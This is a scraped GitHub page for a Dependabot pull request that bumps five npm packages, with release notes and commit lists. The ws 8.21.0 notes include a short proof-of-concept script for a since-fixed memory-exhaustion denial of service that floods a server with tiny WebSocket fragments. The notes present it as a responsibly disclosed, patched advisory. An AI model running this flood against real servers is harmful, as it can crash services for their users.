chore(deps)(deps): bump the npm-production group across 1 directory with 5 updates by dependabot[bot] · Pull Request #1133 · rocketride-org/rocketride-server

dependabot · 2026-06-05T05:27:21Z

Bumps the npm-production group with 5 updates in the / directory:

Package	From	To
tar	`7.5.15`	`7.5.16`
lucide-react	`0.460.0`	`0.577.0`
ws	`8.20.1`	`8.21.0`
web-vitals	`5.2.0`	`5.3.0`
shaders	`2.5.109`	`2.5.129`

Updates tar from 7.5.15 to 7.5.16

Commits

cf21338 7.5.16
21a8220 do not apply PAX header fields to meta entries
52632cf update project deps
302f51f fix inconsequential typo in PENDINGLINKS symbol name
55dbb99 remove some uses of mutate-fs
See full diff in compare view

Updates lucide-react from 0.460.0 to 0.577.0

Release notes

Sourced from lucide-react's releases.

Version 0.577.0

What's Changed

chore(deps): bump rollup from 4.53.3 to 4.59.0 by @dependabot[bot] in lucide-icons/lucide#4106

fix(repo): correctly ignore docs/releaseMetadata via .gitignore by @bhavberi in lucide-icons/lucide#4100

feat(icons): added ellipse icon by @KISHORE-KUMAR-S in lucide-icons/lucide#3749

New Contributors

@bhavberi made their first contribution in lucide-icons/lucide#4100

@KISHORE-KUMAR-S made their first contribution in lucide-icons/lucide#3749

Full Changelog: lucide-icons/lucide@0.576.0...0.577.0

Version 0.576.0

What's Changed

Added zodiac signs by @karsa-mistmere in lucide-icons/lucide#712

fix(icons): fixes guideline violations in package-* icons. by @karsa-mistmere in lucide-icons/lucide#4074

fix(icons): changed receipt icon by @karsa-mistmere in lucide-icons/lucide#4075

fix(icons): updated cuboid icon tags and categories by @karsa-mistmere in lucide-icons/lucide#4095

fix(icons): changed cuboid icon by @jamiemlaw in lucide-icons/lucide#4098

fix(lucide-font, lucide-static): Fixing stable code points by @ericfennis in lucide-icons/lucide#3894

feat(icons): added fishing-rod icon by @7ender in lucide-icons/lucide#3839

Full Changelog: lucide-icons/lucide@0.575.0...0.576.0

Version 0.575.0

What's Changed

feat(icons): added message-square-check icon by @karsa-mistmere in lucide-icons/lucide#4076

fix(lucide): Fix ESM Module output path in build by @ericfennis in lucide-icons/lucide#4084

feat(icons): added metronome icon by @edwloef in lucide-icons/lucide#4063

fix(icons): remove execution permission of SVG files by @duckafire in lucide-icons/lucide#4053

fix(icons): changed file-pen-line icon by @jguddas in lucide-icons/lucide#3970

feat(icons): added square-arrow-right-exit and square-arrow-right-enter icons by @EthanHazel in lucide-icons/lucide#3958

fix(icons): renamed flip-* to square-centerline-dashed-* by @jguddas in lucide-icons/lucide#3945

New Contributors

@edwloef made their first contribution in lucide-icons/lucide#4063

@duckafire made their first contribution in lucide-icons/lucide#4053

Full Changelog: lucide-icons/lucide@0.573.0...0.575.0

Version 0.574.0

What's Changed

fix(icons): changed rocking-chair icon by @jamiemlaw in lucide-icons/lucide#3445

fix(icons): flipped coins icon by @jguddas in lucide-icons/lucide#3158

feat(icons): added x-line-top icon by @jguddas in lucide-icons/lucide#2838

feat(icons): added mouse-left icon by @marvfash in lucide-icons/lucide#2788

feat(icons): added mouse-right icon by @marvfash in lucide-icons/lucide#2787

New Contributors

... (truncated)

Commits

f6c0d06 chore(deps): bump rollup from 4.53.3 to 4.59.0 (#4106)
67c0485 feat(scripts): added helper script to automatically update OpenCollective bac...
b6ed43d feat(packages): Added aria-hidden fallback for decorative icons to all packag...
076e0bb chore(dependencies): Update dependencies (#3809)
80d6f73 fix(icons): Rename fingerprint icon to fingerprint-pattern (#3767)
1cfb3ff chore(deps-dev): bump vite from 6.3.5 to 6.3.6 (#3611)
e71198d chore: icon alias improvements (#2861)
3e644fd chore(scripts): Refactor scripts to typescript (#3316)
19fa01b build(deps-dev): bump vite from 6.3.2 to 6.3.4 (#3181)
03eb862 use implicit return in react package (#2325)
Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by GitHub Actions, a new releaser for lucide-react since your current version.

Updates ws from 8.20.1 to 8.21.0

Release notes

Sourced from ws's releases.

8.21.0

Features

Introduced the maxBufferedChunks and maxFragments options (2b2abd45).

Bug fixes

Fixed a remote memory exhaustion DoS vulnerability (2b2abd45).

A high volume of tiny fragments and data chunks could be sent by a peer, using modest network traffic, to crash a ws server or client due to OOM.
import { WebSocket, WebSocketServer } from 'ws';
const wss = new WebSocketServer({ port: 0 }, function () {
const data = Buffer.alloc(1);
const options = { fin: false };
const { port } = wss.address();
const ws = new WebSocket(ws://localhost:${port});
ws.on('open', function () {
(function send() {
ws.send(data, options, function (err) {
if (err) return;
send();
});
})();
});
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(client close - code: ${code} reason: ${reason.toString()});
});
});
wss.on('connection', function (ws) {
ws.on('error', console.error);
ws.on('close', function (code, reason) {
console.log(server close - code: ${code} reason: ${reason.toString()});
});
});
The vulnerability was responsibly disclosed and fixed by Nadav Magier.

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Commits

bca91ad [dist] 8.21.0
2b2abd4 [security] Limit retained message parts
78eabe2 [security] Add latest vulnerability to SECURITY.md
See full diff in compare view

Updates web-vitals from 5.2.0 to 5.3.0

Changelog

Sourced from web-vitals's changelog.

v5.3.0 (2026-05-28)

Remove getFirstHiddenTimePolyfill (#729)

Fixed issue where the same configuration object to multiple metric functions can result in errors (#731)

Add more robust interactionTarget setting for INP (#744)

Commits

a6a5846 Release v5.3.0
fe42cba Prep changelog for v.5.3.0 (#745)
c8a1419 Add better target selector attempts for INP (#744)
91ae2cb Bump fast-xml-parser from 5.5.7 to 5.7.1 (#730)
8e35542 fix: key initUnique instanceMap by class to prevent cross-class instance coll...
5595f31 Remove getFirstHiddenTimePolyfill (#729)
331486c Bump lodash from 4.17.23 to 4.18.1 (#723)
7917d30 Bump basic-ftp from 5.2.0 to 5.2.2 (#727)
7b7c84c Fix flakey test (#721)
a86518a Bump picomatch from 2.3.1 to 2.3.2 (#720)
Additional commits viewable in compare view

Updates shaders from 2.5.109 to 2.5.129

github-actions · 2026-06-05T05:27:50Z

🤖 Internal: Discord sync marker

Auto-managed by the Discord notification workflow. Stores the linked Discord message ID. Do not edit or delete.

…ith 5 updates Bumps the npm-production group with 5 updates in the / directory: | Package | From | To | | --- | --- | --- | | [tar](https://github.com/isaacs/node-tar) | `7.5.15` | `7.5.16` | | [lucide-react](https://github.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react) | `0.460.0` | `0.577.0` | | [ws](https://github.com/websockets/ws) | `8.20.1` | `8.21.0` | | [web-vitals](https://github.com/GoogleChrome/web-vitals) | `5.2.0` | `5.3.0` | | [shaders](https://shaders.com/) | `2.5.109` | `2.5.129` | Updates `tar` from 7.5.15 to 7.5.16 - [Release notes](https://github.com/isaacs/node-tar/releases) - [Changelog](https://github.com/isaacs/node-tar/blob/main/CHANGELOG.md) - [Commits](isaacs/node-tar@v7.5.15...v7.5.16) Updates `lucide-react` from 0.460.0 to 0.577.0 - [Release notes](https://github.com/lucide-icons/lucide/releases) - [Commits](https://github.com/lucide-icons/lucide/commits/0.577.0/packages/lucide-react) Updates `ws` from 8.20.1 to 8.21.0 - [Release notes](https://github.com/websockets/ws/releases) - [Commits](websockets/ws@8.20.1...8.21.0) Updates `web-vitals` from 5.2.0 to 5.3.0 - [Changelog](https://github.com/GoogleChrome/web-vitals/blob/main/CHANGELOG.md) - [Commits](GoogleChrome/web-vitals@v5.2.0...v5.3.0) Updates `shaders` from 2.5.109 to 2.5.129 --- updated-dependencies: - dependency-name: lucide-react dependency-version: 0.577.0 dependency-type: direct:production update-type: version-update:semver-minor dependency-group: npm-production - dependency-name: shaders dependency-version: 2.5.129 dependency-type: direct:production update-type: version-update:semver-patch dependency-group: npm-production - dependency-name: tar dependency-version: 7.5.16 dependency-type: direct:production update-type: version-update:semver-patch dependency-group: npm-production - dependency-name: web-vitals dependency-version: 5.3.0 dependency-type: direct:production update-type: version-update:semver-minor dependency-group: npm-production - dependency-name: ws dependency-version: 8.21.0 dependency-type: direct:production update-type: version-update:semver-minor dependency-group: npm-production ... Signed-off-by: dependabot[bot] <support@github.com>

dependabot · 2026-06-10T17:31:05Z

Superseded by #1215.

dependabot Bot added area: deps Dependency updates (Dependabot, supply chain) dependencies Pull requests that update a dependency file labels Jun 5, 2026

dependabot Bot requested review from Rod-Christensen, jmaionchi and stepmikhaylov as code owners June 5, 2026 05:27

dependabot Bot added dependencies Pull requests that update a dependency file area: deps Dependency updates (Dependabot, supply chain) labels Jun 5, 2026

github-actions Bot added module:vscode VS Code extension module:ui Chat UI and Dropper UI module:client-typescript labels Jun 5, 2026

dependabot Bot force-pushed the dependabot/npm_and_yarn/npm-production-b449fcdbb5 branch 2 times, most recently from 7b60c0b to f161eea Compare June 8, 2026 13:27

dependabot Bot force-pushed the dependabot/npm_and_yarn/npm-production-b449fcdbb5 branch from f161eea to 3851f67 Compare June 9, 2026 01:10

dependabot Bot closed this Jun 10, 2026

dependabot Bot deleted the dependabot/npm_and_yarn/npm-production-b449fcdbb5 branch June 10, 2026 17:31

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

chore(deps)(deps): bump the npm-production group across 1 directory with 5 updates#1133

chore(deps)(deps): bump the npm-production group across 1 directory with 5 updates#1133
dependabot[bot] wants to merge 1 commit into
developfrom
dependabot/npm_and_yarn/npm-production-b449fcdbb5

dependabot Bot commented on behalf of github Jun 5, 2026 •

edited

Loading

Uh oh!

github-actions Bot commented Jun 5, 2026

Uh oh!

dependabot Bot commented on behalf of github Jun 10, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

Conversation

dependabot Bot commented on behalf of github Jun 5, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Version 0.577.0

What's Changed

New Contributors

Version 0.576.0

What's Changed

Version 0.575.0

What's Changed

New Contributors

Version 0.574.0

What's Changed

New Contributors

8.21.0

Features

Bug fixes

v5.3.0 (2026-05-28)

Uh oh!

github-actions Bot commented Jun 5, 2026

Uh oh!

dependabot Bot commented on behalf of github Jun 10, 2026

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

0 participants

dependabot Bot commented on behalf of github Jun 5, 2026 •

edited

Loading